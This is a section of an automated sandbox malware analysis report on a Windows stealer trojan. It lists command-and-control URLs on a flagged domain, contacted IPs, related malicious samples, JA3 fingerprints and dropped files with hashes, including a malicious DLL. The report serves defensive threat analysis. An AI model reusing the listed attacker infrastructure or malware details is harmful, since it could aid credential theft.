https://undesirabkel.click:443/api	aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apirs	aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/a	aspnet_regiis.exe, 00000002.00000003.1806587367.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810076497.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/d	aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apia7p_=	aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/apiG5s_	aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apiam	aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/api:5	aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	aspnet_regiis.exe, 00000002.00000003.1837352702.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/#	aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796892734.0000000002B33000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	undesirabkel.click	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584118
Start date and time:	2025-01-04 09:41:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9cOUjp7ybm.exe renamed because original name is a hash value
Original Sample Name:	1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 33 Number of non-executed functions: 60
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29, 40.126.32.76, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:41:59	API Interceptor	8x Sleep call for process: aspnet_regiis.exe modified
03:42:01	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
undesirabkel.click	PASS-1234.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse	172.67.166.199
	4.elf	Get hash	malicious	Unknown	Browse	1.13.111.69
	31.13.224.14-mips-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	1.4.15.193
	random.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	random.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	download.bin.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832	Get hash	malicious	KnowBe4	Browse	104.18.90.62
	hthjjadrthad.exe	Get hash	malicious	LummaC	Browse	104.21.85.66

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	random.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	download.bin.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	hthjjadrthad.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.96.3
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	188.114.96.3
	nayfObR.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9cOUjp7ybm.exe_b952a5b7d6b454dd87179fa1ef45e68ce4bf810_2bfc0910_afc74728-264e-41f0-bf2f-00ecc5bf4e9f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9899121708814769
Encrypted:	false
SSDEEP:	96:ZPF5LXWPakhedHjtkMldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkEwV:xGDhedxkd0BU/qaGpezuiFcMZ24IO8q
MD5:	751FBAD4185099B00EB558FC12665505
SHA1:	3234BC93FB62EC839D03994C69FA3721133D95C0
SHA-256:	3E6316DBB009F788BC2E65D738E2AD80D6A2BAD6F104EC6834F7BB958FB7E8F3
SHA-512:	6963DF8F56DCED2D8678C993D8469EDA078030841718BE27DD86F2FAA07FEBB6AA6B6F736ABCFC442F5648E463219530EC86D3A72B15CB5B8306FC392B17AE1C
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.5.3.7.1.9.0.6.4.7.9.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.5.3.7.1.9.5.4.9.1.7.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.c.7.4.7.2.8.-.2.6.4.e.-.4.1.f.0.-.b.f.2.f.-.0.0.e.c.c.5.b.f.4.e.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.9.9.1.c.a.4.-.8.7.c.a.-.4.2.f.9.-.b.2.2.2.-.0.4.c.5.c.5.4.d.7.5.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.c.O.U.j.p.7.y.b.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Q.u.i.n.n.S.a.m.u.e.l.Y.v.o.n.n.e...l.n.k.n.x.L.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.0.-.0.0.0.1.-.0.0.1.4.-.3.7.8.8.-.f.5.8.3.8.4.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.9.0.0.1.8.c.8.9.3.1.4.8.6.2.1.6.0.8.a.e.a.d.2.7.0.0.1.c.d.c.9.0.0.0.0.0.0.0.0.!.0.0.0.0.c.d.b.7.a.e.f.7.f.7.a.0.5.4.3.0.d.3.2.3.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB44.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 4 08:41:59 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	197190
Entropy (8bit):	3.3460013108985334
Encrypted:	false
SSDEEP:	1536:mMyEyz2GYcXzpN4uE2aOuM73dVyLTg3Bo0ZdCDQ/oRGuKF:zyPzHYu4uEqH3dVyLTg3BoZQE1K
MD5:	D06B78567D155092D9FC7103023B547A
SHA1:	09CFDFF0FB0A8AC0AEF6A43F9B242D566628A473
SHA-256:	94CF334979F8574FD285E5EE12023CF7DE731E32C158BB2A1AD8E4B98C72FDD7
SHA-512:	E15F56DFFDF8299BFE7A57A48FDE372C92D68E20A2932DF5349768895BB1A6463D78366667EF62EF3B92B7E0E2348F90DBA00E54246CA2832854404B016CD63A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......W.xg............D...............X.......$................J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T...........V.xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC5E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8416
Entropy (8bit):	3.710386919517836
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8v6s6Y9iSUThcZgmfZPYnprT89bD8sf0cBm:R6lXJE6s6Y4SUTKZgmfBYuDPf6
MD5:	246624BE1787D3C8E4086D7385983C59
SHA1:	1E25EDB2F84CA54557C159043E192C5752844A14
SHA-256:	2FC30936B9DAE863FAE91A5DC44B7FEFA440D6ACC8234B5F4FD06A98ABD134FD
SHA-512:	4E6030E314663D748D9B66A51607F682D4D31EE26618FC51620F8800A296ED7286C2E102EAA4C1254304939F5317C1555CD2AD9CA9660A1ECAEEC69B6E73D504
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4782
Entropy (8bit):	4.533316435586078
Encrypted:	false
SSDEEP:	48:cvIwWl8zseiJg77aI9liWpW8VYtcYm8M4J92Ft0+q8v2ahIpd3Nud:uIjfewI7Pj7VU5JvKjKpd3Nud
MD5:	21BE0A5846D39696BA300D746EB2BA02
SHA1:	5B18E49595EB126C6F52E5B95E0BA2CCD22834AD
SHA-256:	7515FF15D7457EE517ACFD0B1D038F6FFB423DEFB71E99BEAA6A860C8E051DB3
SHA-512:	B139DD85570D9E95C42FB229CCB01307302F14E8AA287E79E39F64473363163DA28E209A7C029BF6C41B9666A85B84B1C31585435391C7CF372E858EB65AA6D6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="660944" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\9cOUjp7ybm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	441856
Entropy (8bit):	7.099141129436754
Encrypted:	false
SSDEEP:	12288:Op8zdbqWi+wkHXZa+PkbCo0GDLob06QUQDCP2/lSWM5W:OGA+DHXZ10do06QUQDB/lU
MD5:	64C287959FF0DBD10DB81BDED030A3A1
SHA1:	ACF88011455FC98D0DE186520B4DDDE5D1CF5F75
SHA-256:	673E0EFEE492A6A82AFCCE12545C4A2D46A1E9E827C33B7A1E9F0A904656A458
SHA-512:	D7CA03F8032E7C9D5882EAD046C33388D5EBBA5923ABD95C3C535945BA4AA8A1FE6E47D116DD9376C6717A36BFF5AC0D0DCFC599526A5FC89D81C3FD3B0517C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L....ug...........!.........:............................................................@.............................\|.......P...............................x...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data...............................@....reloc..x...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465660386383278
Encrypted:	false
SSDEEP:	6144:9IXfpi67eLPU9skLmb0b4hWSPKaJG8nAgejZMMhA2gX4WABl0uNudwBCswSbd:uXD94hWlLZMM6YFHI+d
MD5:	008DCCD74F98C7BF020692781A4B58CF
SHA1:	9C9EFB0208D8C5D80CB8CBF4A54C0EA856E6D5CA
SHA-256:	4A9E21A61F1EFD97F9AAC9BC955FC07F17466252B5CD269BE3F781EDE05EEA04
SHA-512:	C148BDF83277500077E9ECCA72A17130D2AEB7611D8C4CE7F5483FA889E63F35D2339035BA9D2DEB0009F07F503FA13916EF3C55BDF02CAA12B550145764D132
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...^............................................................................................................................................................................................................................................................................................................................................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\9cOUjp7ybm.exe
File Type:	ASCII text, with very long lines (353), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1414
Entropy (8bit):	4.538550000655599
Encrypted:	false
SSDEEP:	24:7v74NulAMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T44AMff2p8p14nrPKktp
MD5:	6C17A359AD8E630345A9D8CE92776AD6
SHA1:	1AB1D85A67065B77B1983436621D81F953311ECD
SHA-256:	FD509D91FE69EC3C4FD468CC55435F09AE046D38234EE12174AAC9BA9B3E35C0
SHA-512:	A9B7F1222AB96D2A221C4956F89733A801FDFC071010620359976AEABD2CEB77766F1038388DB449E28C8995B9F8A9126CE5376FAF0F3D88BA122CDEC7C28058
Malicious:	false
Reputation:	low
